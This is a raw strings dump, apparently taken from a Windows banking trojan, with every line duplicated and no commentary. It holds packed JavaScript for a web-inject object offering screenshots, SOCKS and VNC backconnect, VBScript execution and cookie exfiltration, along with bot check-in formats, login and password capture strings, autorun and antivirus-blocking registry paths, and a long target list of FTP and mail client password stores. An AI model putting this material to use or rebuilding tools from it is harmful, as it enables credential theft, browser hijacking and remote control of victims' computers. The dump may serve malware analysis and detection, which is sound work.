
places.sqlite

ie/history.txt

ie/history.txt

ff/history.txt

ff/history.txt

ff/%u/places.sqlite

ff/%u/places.sqlite

framework_key%

framework_key%

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval('var %s '

eval('var %s '

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

%s.Key = '%s';

%s.Key = '%s';

%s.Hide('%0.8X%0.8X');

%s.Hide('%0.8X%0.8X');

CertificateAuthority

CertificateAuthority

%s.pfx

%s.pfx

cookies.sqlite

cookies.sqlite

cookies.sqlite-journal

cookies.sqlite-journal

ff/%u/cookies.sqlite

ff/%u/cookies.sqlite

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

[%s - X32 EQ PID: %u TID: %u]

[%s - X32 EQ PID: %u TID: %u]

X-Firefox-Spdy

X-Firefox-Spdy

X-WebKit-CSP

X-WebKit-CSP

hXXps://

hXXps://

HTTP/1.1 200 OK

HTTP/1.1 200 OK

Content-Length: %u

Content-Length: %u

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.0

GET /favicon.ico HTTP/1.0

login=%s&pass=%s

login=%s&pass=%s

chrome.dll

chrome.dll

127.0.0.1

127.0.0.1

DrWeb

DrWeb

McAfee.com

McAfee.com

Doctor Web

Doctor Web

Common Files\Doctor Web

Common Files\Doctor Web

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\Run

regsvr32.exe "%s"

regsvr32.exe "%s"

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

[VNC] Parse param error: %s

[VNC] Parse param error: %s

\regsvr32.exe

\regsvr32.exe

[VNC] Fail create process: %u

[VNC] Fail create process: %u

[VNC] Fail inject to process: %u

[VNC] Fail inject to process: %u

fv_%u.avi

fv_%u.avi

#FV_%u

#FV_%u

#FV_%s

#FV_%s

pass.txt

pass.txt

cert.pfx

cert.pfx

PFXImportCertStore

PFXImportCertStore

Crypt32.dll

Crypt32.dll

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3-1", false);

user_pref("network.http.spdy.enabled.v3-1", false);

prefs.js

prefs.js

csrss.exe

csrss.exe

smss.exe

smss.exe

wininit.exe

wininit.exe

services.exe

services.exe

svchost.exe

svchost.exe

lsas.exe

lsas.exe

lsm.exe

lsm.exe

winlogon.exe

winlogon.exe

taskhost.exe

taskhost.exe

HttpEndRequestA

HttpEndRequestA

HttpEndRequestW

HttpEndRequestW

ADVAPI32.DLL

ADVAPI32.DLL

Init in Browser = %u

Init in Browser = %u

Init in Shell = %u

Init in Shell = %u

[Socks] Failt connect BC [%s:%u]

[Socks] Failt connect BC [%s:%u]

[Socks] Fail parse param: %s

[Socks] Fail parse param: %s

Shell Update Exists %s = %s

Shell Update Exists %s = %s

Shell Reload status = %u = %u

Shell Reload status = %u = %u

#cert

#cert

Del Old = %s

Del Old = %s

Del Reg = %s

Del Reg = %s

Fail Save New = %u

Fail Save New = %u

Reg Autorun = %u = %u = %ws = %ws

Reg Autorun = %u = %u = %ws = %ws

Updated fail size %u != %u

Updated fail size %u != %u

Updated RSA Init fail = %u

Updated RSA Init fail = %u

Sign Bad = %u

Sign Bad = %u

Save New File = %u = %u

Save New File = %u = %u

Update_InstallNew = %u = %u

Update_InstallNew = %u = %u

[Pony] Fail Get Pass

[Pony] Fail Get Pass

Start Update: %s = %u

Start Update: %s = %u

download status = %u =%u

download status = %u =%u

Updated status = %u

Updated status = %u

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status[Local]: %u = %u

DL_EXEC Status[Local]: %u = %u

Start Socks addr: %s

Start Socks addr: %s

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Local]: %u

Start Socks Status[Local]: %u

Start VNC addr: %s

Start VNC addr: %s

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Local]: %u

Start VNC Status[Local]: %u

msvcrt.dll

msvcrt.dll

%0.8X%0.8X%c

%0.8X%0.8X%c

firefox.exe

firefox.exe

explorer.exe

explorer.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

%Program Files%\Mozilla Firefox\

%Program Files%\Mozilla Firefox\

mozsqlite3.dll

mozsqlite3.dll

sqlite3_open

sqlite3_open

sqlite3_exec

sqlite3_exec

sqlite3_close

sqlite3_close

sqlite3_free

sqlite3_free

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

hXXp://

hXXp://

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

\\.\pipe\

\\.\pipe\

PID: %u [%0.2u:%0.2u:%0.2u]

PID: %u [%0.2u:%0.2u:%0.2u]

[BC] Cmd Ver Error

[BC] Cmd Ver Error

[BC] Wait Ping error %u[%u]

[BC] Wait Ping error %u[%u]

[BC] Fail Connect: %u

[BC] Fail Connect: %u

[BC] Fail read cmd

[BC] Fail read cmd

[BC] Cmd need reauth

[BC] Cmd need reauth

[BC] cmd error: %u

[BC] cmd error: %u

[BC] Cmd need disconnect

[BC] Cmd need disconnect

ntdll.dll

ntdll.dll

gdiplus.dll

gdiplus.dll

GdiplusShutdown

GdiplusShutdown

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

account.cfg

account.cfg

account.cfn

account.cfn

Dir #%u

Dir #%u

.oeaccount

.oeaccount

Software\Microsoft\Windows Live Mail

Software\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

Software\Microsoft\Windows Mail

Software\Microsoft\Windows Mail

\Microsoft\Windows Mail

\Microsoft\Windows Mail

PopPort

PopPort

PopPassword

PopPassword

SmtpServer

SmtpServer

SmtpPort

SmtpPort

SmtpAccount

SmtpAccount

SmtpPassword

SmtpPassword

abe2869f-9b47-4cd9-a358-c22904dba7f7

abe2869f-9b47-4cd9-a358-c22904dba7f7

MS IE FTP Passwords

MS IE FTP Passwords

RushSite.xml

RushSite.xml

\FTPRush

\FTPRush

bitkinex.ds

bitkinex.ds

NDSites.ini

NDSites.ini

Software\LeechFTP

Software\LeechFTP

bookmark.dat

bookmark.dat

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

sites.db

sites.db

servers.xml

servers.xml

\FTPGetter

\FTPGetter

ESTdb2.dat

ESTdb2.dat

\Estsoft\ALFTP

\Estsoft\ALFTP

QData.dat

QData.dat

SM.arch

SM.arch

FTP .Link\shell\open\command

FTP .Link\shell\open\command

NppFTP.xml

NppFTP.xml

Software\MAS-Soft\FTPInfo\Setup

Software\MAS-Soft\FTPInfo\Setup

ServerList.xml

ServerList.xml

\FTPInfo

\FTPInfo

NovaFTP.db

NovaFTP.db

\INSoftware\NovaFTP

\INSoftware\NovaFTP

\sites.xml

\sites.xml

ftplast.osd

ftplast.osd

\SharedSettings.ccs

\SharedSettings.ccs

\SharedSettings.sqlite

\SharedSettings.sqlite

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.sqlite

\SharedSettings_1_0_5.sqlite

\32BitFtp.ini

\32BitFtp.ini

FTPCON

FTPCON

FTP CONTROL

FTP CONTROL

FTPVoyager.ftp

FTPVoyager.ftp

\RhinoSoft.com

\RhinoSoft.com

FTPVoyager.qc

FTPVoyager.qc

FTPVoyager.Archive

FTPVoyager.Archive

SiteInfo.QFP

SiteInfo.QFP

WinFTP

WinFTP

DeluxeFTP

DeluxeFTP

sites.xml

sites.xml

Staff-FTP

Staff-FTP

sites.ini

sites.ini

FreshFTP

FreshFTP

Software\FlashPeak\BlazeFtp\Settings

Software\FlashPeak\BlazeFtp\Settings

LastPassword

LastPassword

LastPort

LastPort

BlazeFtp

BlazeFtp

site.dat

site.dat

\BlazeFtp

\BlazeFtp

GoFTP

GoFTP

Connections.txt

Connections.txt

3D-FTP

3D-FTP

\3D-FTP

\3D-FTP

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

EasyFTP

EasyFTP

FTPNow

FTPNow

FTP Now

FTP Now

FTPShell

FTPShell

ftpshell.fsi

ftpshell.fsi

ftpsite.ini

ftpsite.ini

FTPList.db

FTPList.db

My FTP

My FTP

project.ini

project.ini

Mailbox.ini

Mailbox.ini

FTP Navigator

FTP Navigator

FTP Commander

FTP Commander

ftplist.txt

ftplist.txt

Software\Sota\FFFTP

Software\Sota\FFFTP

Software\Sota\FFFTP\Options

Software\Sota\FFFTP\Options

Software\FTPWare\COREFTP\Sites

Software\FTPWare\COREFTP\Sites

FtpPort

FtpPort

Software\Cryer\WebSitePublisher

Software\Cryer\WebSitePublisher

_Password

_Password

Software\NCH Software\ClassicFTP\FTPAccounts

Software\NCH Software\ClassicFTP\FTPAccounts

FtpPassword

FtpPassword

_FtpPassword

_FtpPassword

FtpServer

FtpServer

FtpUserName

FtpUserName

FtpDirectory

FtpDirectory

Software\FTPClient\Sites

Software\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

PortNumber

PortNumber

PassWord

PassWord

Software\South River Technologies\WebDrive\Connections

Software\South River Technologies\WebDrive\Connections

Software\LinasFTP\Site Manager

Software\LinasFTP\Site Manager

FTP destination password

FTP destination password

FTP destination server

FTP destination server

FTP destination port

FTP destination port

FTP destination user

FTP destination user

FTP destination catalog

FTP destination catalog

FTP profiles

FTP profiles

Msi.dll

Msi.dll

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

\PocoSystem.ini

\PocoSystem.ini

accounts.ini

accounts.ini

sites.dat

sites.dat

\LeapWare\LeapFTP

\LeapWare\LeapFTP

unleap.exe

unleap.exe

leapftp

leapftp

FtpIniName

FtpIniName

Software\Ghisler\Windows Commander

Software\Ghisler\Windows Commander

wcx_PTF.ini

wcx_PTF.ini

Server.Pass

Server.Pass

Server.Host

Server.Host

Server.User

Server.User

Server.Port

Server.Port

Last Server Pass

Last Server Pass

Last Server Port

Last Server Port

\sitemanager.xml

\sitemanager.xml

\recentservers.xml

\recentservers.xml

\filezilla.xml

\filezilla.xml

"password" : "

"password" : "

"password":"

"password":"

\drives.js

\drives.js

\ExpanDrive\favorites.js

\ExpanDrive\favorites.js

\ExpanDrive\drives.js

\ExpanDrive\drives.js

wiseftpsrvs.ini

wiseftpsrvs.ini

wisePTF.ini

wisePTF.ini

wiseftpsrvs.bin

wiseftpsrvs.bin

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

FTP Count

FTP Count

FTP File%u

FTP File%u

Robo-FTP

Robo-FTP

SOFTWARE\%s\FTPServers

SOFTWARE\%s\FTPServers

user.config

user.config

.duck

.duck

SiteServer %u\Host

SiteServer %u\Host

SiteServer %u\WebUrl

SiteServer %u\WebUrl

SiteServer %u\Remote Directory

SiteServer %u\Remote Directory

SiteServer %u-User

SiteServer %u-User

SiteServer %u-User PW

SiteServer %u-User PW

SiteServer %u\SFTP

SiteServer %u\SFTP

Keychain

Keychain

Software\Nico Mak Computing\WinZip\FTP

Software\Nico Mak Computing\WinZip\FTP

Password

Password

Software\Far\Plugins\FTP\Hosts

Software\Far\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far\SavedDialogHistory\FTPHost

Software\Far\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

\win.ini

\win.ini

WS_FTP

WS_FTP

\Ipswitch\WS_FTP

\Ipswitch\WS_FTP

\GlobalSCAPE\CuteFTP

\GlobalSCAPE\CuteFTP

sm.dat

sm.dat

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Lite

\GlobalSCAPE\CuteFTP Lite

\CuteFTP

\CuteFTP

CUTEFTP

CUTEFTP

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

\Sites.dat

\Sites.dat

\Quick.dat

\Quick.dat

\History.dat

\History.dat

Software\BPFTP\Bullet Proof FTP\Main

Software\BPFTP\Bullet Proof FTP\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BPFTP\Bullet Proof FTP\Options

Software\BPFTP\Bullet Proof FTP\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BPFTP

Software\BPFTP

\SmartFTP

\SmartFTP

Favorites.dat

Favorites.dat

History.dat

History.dat

Software\TurboFTP

Software\TurboFTP

\TurboFTP

\TurboFTP

addrbk.dat

addrbk.dat

quick.dat

quick.dat

Port

Port

Login

Login

PasswordType

